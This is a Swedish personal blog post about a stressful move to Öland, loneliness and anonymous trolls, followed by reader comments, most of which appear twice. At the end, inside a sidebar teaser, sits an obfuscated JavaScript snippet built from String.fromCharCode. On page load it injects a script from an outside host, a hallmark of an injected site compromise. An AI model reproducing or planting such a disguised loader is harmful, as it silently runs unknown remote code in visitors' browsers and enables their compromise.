Det här med nättroll!?!

051016-MyMartens-HermanCaroan-170117-0287

Reflektion✨

Att ibland stanna upp och se på vad man har. Vad man ha skapat, vad man har uppnått. Jag hamnar ofta i fällan att jag fokuserar på målet…. målet lååååångt där framme. Jag säger inte att det är fel. Som entrepenör och egen företagare sedan 18 års ålder så är långsiktiga mål givet. Men jag är i en period där jag ställts inför flera vägskäl senaste året. Både privat, men också i jobb. Stora beslut, extremt mycket press & stress.

När jag tänker tillbaka och minns både svåra stunder men också roliga Stunder. Då ler jag.

Jag skrämms dock av känslan av hur trött jag faktiskt är är. Jag är så van att leverera och prestera maximalt. I allt jag gör. Nu står jag stilla och ”trampar vatten”. Inte i min resa där jag jobbar med mig själv. Utan i det faktum att jag måste invänta saker, som tex flytten. Svar om utbildning. M.m.

Jag har en plan, en strategi på hur jag ska nå mina mål. Både långsiktiga och kortsiktiga. Men det kryper i kroppen när jag mitt i detta ska bryta upp från min vardag, och skaffa en ny vardag. Jag är ordagrant LIVRÄDD över hur jag ska reagera när jag kommer ner till Öland. Öland är Inter mitt ”hem”. Det är en plats fått jag bosatte mig då jag träffade Lillemans pappa. Öland har gett mig många fina år med härliga minne . Men också en hel del negativt. Saker jag bara velat förtränga. Lämna bakom mig. Jag får ångest av bara självaste tanken på att köra över Ölandsbron. Att komma ”hem”. Jag har fortfarande inte åkt förbi min butik. Mitt livsverk som jag ritat och byggt upp från grunden.

-hur kommer det att kännas?

Hur förbereder jag mig på bästa sätt inför att komma ner? Många frågor. Jag kommer hinna träffa psykologen innan. Det känns skönt. Jag behöver ventilera och förbereda mig på något sätt. Jag vill ge Lilleman en positiv start, en rofylld känsla. Jag vill att han ska känna sig ”hemma”❤️

 Detta året har gått till att rannsaka mig själv, bearbeta, sörja, ”laga”, och planera. Både privat och yrkesmässigt. Jag har hunnit med att utbilda mig till personlig tränar. (STOLT!) Jag trivs med att jobba som det. Älskar att motivera och puscha människor mot sina mål✨👊🏻💪🏻

Ibland är det lättare för mig att deala med andra människor ”problem” än mina egna… Jag har inte svårt att vara social i grupp. (Väljer mina tillfällen efter min dagsform och prioriterar min ”återhämtning”) Men jag har svårt för att vara ensam just nu. Att umgås med mig själv. 

Vissa uppskattar ensamheten. Jag är tvärt om. När jag sitter själv hemma om kvällarna så pratar jag i telefonen. Varför ska det vara så svårt att umgås med sig själv?

Detta låter säkert helt knäppt. Men sista året är detta mitt största problem. Det är DÅ ångesten slår till. Jag trivs inte med att vara ensam. Det äter upp mig inombords… jag får ångest och upplever känslor som är fruktansvärda!  Typ som social fobi, fast tvärtom!

 Jag ser mig inte som en knäppis. Jag ser mig själv som en helt vanlig tjej som gått igenom mycket på kort tid. Det ger bieffekter. Men är samtidigt EXTREMT utvecklande!

I höst är det dags för nästa steg…. mot nya mål🌟

Under tiden föröker jag att ”läka”, vila och bugga upp våran vardag. Den där j*vla flytten ska jag bara ta mig igenom… det kommer jag att göra!

-watch me! 

Åza och jag brukar skoja internt om det där med att vara ensam. Hon är tvärt om, låser gärna in sig och duckar för omgivningen 😂 Lite komiskt då vi båda har haft ett och annat att deala med och vi som alltid brukar lyfta varandra, behöver den ena energi så kliver den andra fram (och tvärt om)

Nu har vi haft en och annan kollision i våran kommunikation (🙈😂❤️) då både är kraftigt ur balans! 

Åza vill gärna ringa tiiiidigt när hon morgon promenerar med Inez. ( som vi ALLTID gjort, under flera år) jag däremot tar mig knappt ur sängen då nattsömnen varit extremt rubbad. Jag sover som bäst mellan 06-09. (Långt ifrån mitt vanliga jag)

När två nära vänner som jag och Åza, så vi brukar kunna lyfta varandra när en av oss har det kämpigt.

Men när båda är ur balans så är det svårt. Trots våra kollesionet så skrattar vi åt elendet och växer oss ännu starkare ur det! ❤️👊🏻 Vi har raderat uttrycket ”NU kan det ändå inte bli värre” ur vårat vokabulär. Det kan det uppenbarligen bli 😂

Vi ser fram emot när vi kan titta tillbaka på det med distans och skratta åt hur bisarrt det var!

Åzas ”stalker” ringde även mig och sa att Åza skulle ta livet av sig. Jag var påväg ut från D-flex, stannade till, hela kroppen frös till is…. någon sekund senare hör jag mig själv säga -Näää, jag pratade med Åza imorse, hon lät inte självmordsbenägen?

Hur sjukt är inte detta. Resten av cirkusen kan ni läsa delar av på Åzas blogg, samt lyssna i våran podd. Alla dom mail som ”stalkern” skickat till ALLa runtomkring, är såklart vidarebefordrade till utredningen osv. 

MEN, nu råkat denna kvinnan vara allt annat än frisk. Det är så sorgligt att jag inte finner några ord. 

I denna ytliga värld på sociala medier så blir man offentlig. På både gott och ont. Det är ett val som jag själv gjort. Skillnaden är att DU som läser kan välja när/om du vill läsa. DU kan välja att vara anonym när du följer/kommenterar och lämnar avtryck. Det kan finnas tusen anledningar till att välja att vara just anonym. Vilket såklart är helt Okay.

Men om man som anonym gång på gång ger sig på, hånar, trakasserar, nedvärderar och går till attack så tycker jag inte att det är Okay!

Vårat samhälle har förändrats, de sista tio åren har socialamedier blivit en stor del av vårat liv. Mer eller mindre. Det är en tuff värld där man påverkas enormt i sin vardag. 

 Nu har ännu än ”anonym” källa krupit fram och börjat insuinerat på att det skulle bra JAG som stalkar Åza!?!

-JAG?! Hur f*n gick det till?! 

HUR sjukt är inte det?!!!

Hur fungerar man som människa när man skriver det här inne på MIN blogg, OCH på Åzas blogg och på andra forum. VAD vill man uppnå? Vart vill man komma?😂

 Världen är full av knäppisar! Jag slutar aldrig förvånas! Så från och med nu, så kommer jag bokstavligen ta bort varenda litet trolls kommentar som kommer in här inne. En efter en. Jag ska inte ge dom NÅGON reaktion. Jag vill inte förpesta DIN bloggstund med en massa galningar och läskiga nättroll.

Vad tror du om detta? ☺️ Kram & Gonatt.

/My Martens

41 Komentarer

 1. God morgon.
  Ja det sista du skrev är nog det bästa sättet.
  Tråkigt att behöva lägga energi på det.
  Ha nu en bra dag när du vaknar.
  Kram L

 2. God morgon fina My. Eller du ligger nog och sover nu.? ta hand om dig nu. Klart du kommer att fixa detta med flytt och allt annat. ? Ja ibland funderar man vilka det är som skriver på olika bloggar. ?. Styrkekramar genom cybervärlden Sara?

 3. God morgon.
  Ja det sista du skrev är nog det bästa sättet.
  Tråkigt att behöva lägga energi på det.
  Ha nu en bra dag när du vaknar.
  Kram L

 4. Hej! Ursäkta att jag faktiskt skrattar. Det var ganska roligt (förstå mig rätt) att läsa att nån skriver att det var/är du som stalkar Åza. Jag vet ju inte hur människan skrev, men när jag läste det du skrev……suck. Jag kunde inte annat än skratta. Galenskapen har gått över alla gränser nu.
  Vart är världen på väg? ett stort ? Man kan ju undra vad som händer. Kan vi inte fokusera lite på det, vad kan ha gjort att det finns så mycket galet folk där ute i etern. Har det alltid gjort det eller är det ett nytt fenomen? Är det nått i luften?

 5. God morgon fina My. Eller du ligger nog och sover nu.😉 ta hand om dig nu. Klart du kommer att fixa detta med flytt och allt annat. 😚 Ja ibland funderar man vilka det är som skriver på olika bloggar. 😳. Styrkekramar genom cybervärlden Sara💕

 6. Hela situationen verkar hur sjuk som helst. Och i Åza´s fall, människan har ju uttalat på Åza´s blogg hur lycklig hon är och så vidare. Varför slutar hon inte med sina påhopp? Jag hoppas verkligen detta får ett slut snart för allas skull.
  Och den nya som nu dykt upp, såg jag, utgav sig för att vara syster till ”någon” som ni båda umgåtts med….herregud, dessa idioter måste ha så mycket fritid och gotta sig i när dom får denna uppmärksamhet.
  Ha nu en skön helg
  Kram

 7. Nu är det jag igen. Men jag försöker verkligen inte trycka ner dig utan jag hejar på dig!
  Jag förstår att det är tungt att återvända till en ö som bara förknippas (kanske inte bara men med mest) dåliga saker!
  Men jag tänker att det kan vara jättebra att flytta tillbaka dit för att bearbeta det dåliga som hänt på ön och liksom ta tillbaka din rätt till Öland!
  Du kommer klara det galant, det kommer säkert vara tufft och jobbigt, men du kommer överleva! Du är stark <3

 8. Hej! Ursäkta att jag faktiskt skrattar. Det var ganska roligt (förstå mig rätt) att läsa att nån skriver att det var/är du som stalkar Åza. Jag vet ju inte hur människan skrev, men när jag läste det du skrev……suck. Jag kunde inte annat än skratta. Galenskapen har gått över alla gränser nu.

  Vart är världen på väg? ett stort ? Man kan ju undra vad som händer. Kan vi inte fokusera lite på det, vad kan ha gjort att det finns så mycket galet folk där ute i etern. Har det alltid gjort det eller är det ett nytt fenomen? Är det nått i luften?

 9. Hela situationen verkar hur sjuk som helst. Och i Åza´s fall, människan har ju uttalat på Åza´s blogg hur lycklig hon är och så vidare. Varför slutar hon inte med sina påhopp? Jag hoppas verkligen detta får ett slut snart för allas skull.
  Och den nya som nu dykt upp, såg jag, utgav sig för att vara syster till ”någon” som ni båda umgåtts med….herregud, dessa idioter måste ha så mycket fritid och gotta sig i när dom får denna uppmärksamhet.
  Ha nu en skön helg
  Kram

 10. Nu är det jag igen. Men jag försöker verkligen inte trycka ner dig utan jag hejar på dig!
  Jag förstår att det är tungt att återvända till en ö som bara förknippas (kanske inte bara men med mest) dåliga saker!
  Men jag tänker att det kan vara jättebra att flytta tillbaka dit för att bearbeta det dåliga som hänt på ön och liksom ta tillbaka din rätt till Öland!
  Du kommer klara det galant, det kommer säkert vara tufft och jobbigt, men du kommer överleva! Du är stark <3

  • Tack Elin 🌸 Jag tar inte det du skriver on kritik (tidigare) vi det bara olika på vissa saker…. tack för din omntanke 🙏🏻❤️

 11. De där trollen, blocka dem.
  Sen önskar jag dig innerlig Bamsekram med styrka i❤️ Å jag hoppas såååå att flytt o annat flyter bra o att du sen kommer till ro❤️

 12. Din flytt låter ju inte alls så bra, speciellt när den är så ångestframkallande. Finns det
  inte någon möjlighet att behålla din bostad i Sigtuna och pendla till Öland?

  • Så har jag också tänkt. My, jag tänker en del på dig. Du trivs så bra i Sigtuna och kommer spendera mycket tid i Stockholm. Vet att din ekonomi är ansträngd av konkursen o att du har flera jobb för att dra in det du behöver. Men kommer du pendla varje dag eller kommer du att behöva bo/övernatta i Stockholm? Var? På hotell? Hos vänner? Det kanske är billigare att ha två hem? Lämna kvar allt i Sigtuna, skaffa det nödvändigaste till Öland o bo där med Ludvig varannan vecka, för både hans och din skull. Och bo de andra veckorna där du trivs och kanske i förlängningen vill få bo och leva. Är det omöjligt? Tänker jag fel? Finns såklart en massa jag inte vet. Men jag vill inte att du ska ha denna ångest över flytten. Jag har själv tre barn, varav två skilsmässobarn o mina svärföräldrar bor på Öland.
   Tänker på dig ❤️

 13. De där trollen, blocka dem.
  Sen önskar jag dig innerlig Bamsekram med styrka i❤️ Å jag hoppas såååå att flytt o annat flyter bra o att du sen kommer till ro❤️

 14. Din flytt låter ju inte alls så bra, speciellt när den är så ångestframkallande. Finns det
  inte någon möjlighet att behålla din bostad i Sigtuna och pendla till Öland?

  • Så har jag också tänkt. My, jag tänker en del på dig. Du trivs så bra i Sigtuna och kommer spendera mycket tid i Stockholm. Vet att din ekonomi är ansträngd av konkursen o att du har flera jobb för att dra in det du behöver. Men kommer du pendla varje dag eller kommer du att behöva bo/övernatta i Stockholm? Var? På hotell? Hos vänner? Det kanske är billigare att ha två hem? Lämna kvar allt i Sigtuna, skaffa det nödvändigaste till Öland o bo där med Ludvig varannan vecka, för både hans och din skull. Och bo de andra veckorna där du trivs och kanske i förlängningen vill få bo och leva. Är det omöjligt? Tänker jag fel? Finns såklart en massa jag inte vet. Men jag vill inte att du ska ha denna ångest över flytten. Jag har själv tre barn, varav två skilsmässobarn o mina svärföräldrar bor på Öland.
   Tänker på dig ❤️

 15. Vad sorgligt att läsa att din flytt till Öland är så ångestladdad. Jag har sagt det förut och jag säger det igen, du är så otroligt stark som alltid tänker på Ludvig i första hand. Som har kunnat ha en fungerande relation med ditt ex, trots hans svek, för Ludvigs skull. Som ger upp ditt liv i Sigtuna, för Ludvigs skull. Så otroligt osjälviskt, kärleksfullt och starkt av dig ❤️. Du kommer att få igen det av Ludvig. Lycka till med allt och stor styrkekram till dig ???!

 16. Ja Gud så skönt, blockera trollen! Ingen mår bra av att läsa elakheter. Mycket roligare att läsa positiva och fina kommentarer. Det finns ju helt rubbade dårfinkar i vår omvärld, om det inte vore så sjukt så skulle det nästan vara komiskt all galenskap de hittar på. Jag hoppas du snart får lugn och ro och att du får en positiv nystart som blir över all förväntan när du landat på Öland. Vem vet, det kanske visar sig bli det bästa du har gjort?!! ? sköt om dig! Kram!

 17. Vad sorgligt att läsa att din flytt till Öland är så ångestladdad. Jag har sagt det förut och jag säger det igen, du är så otroligt stark som alltid tänker på Ludvig i första hand. Som har kunnat ha en fungerande relation med ditt ex, trots hans svek, för Ludvigs skull. Som ger upp ditt liv i Sigtuna, för Ludvigs skull. Så otroligt osjälviskt, kärleksfullt och starkt av dig ❤️. Du kommer att få igen det av Ludvig. Lycka till med allt och stor styrkekram till dig 💞👊🏻!

 18. Ja Gud så skönt, blockera trollen! Ingen mår bra av att läsa elakheter. Mycket roligare att läsa positiva och fina kommentarer. Det finns ju helt rubbade dårfinkar i vår omvärld, om det inte vore så sjukt så skulle det nästan vara komiskt all galenskap de hittar på. Jag hoppas du snart får lugn och ro och att du får en positiv nystart som blir över all förväntan när du landat på Öland. Vem vet, det kanske visar sig bli det bästa du har gjort?!! 🙂 sköt om dig! Kram!

 19. Hoppas att du trivs och smälter in bättre på Öland denna gång. Dukanske skulle pröva på att sticka ut mindre så kanske du blir omtyckt.

 20. Hoppas att du trivs och smälter in bättre på Öland denna gång. Dukanske skulle pröva på att sticka ut mindre så kanske du blir omtyckt.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/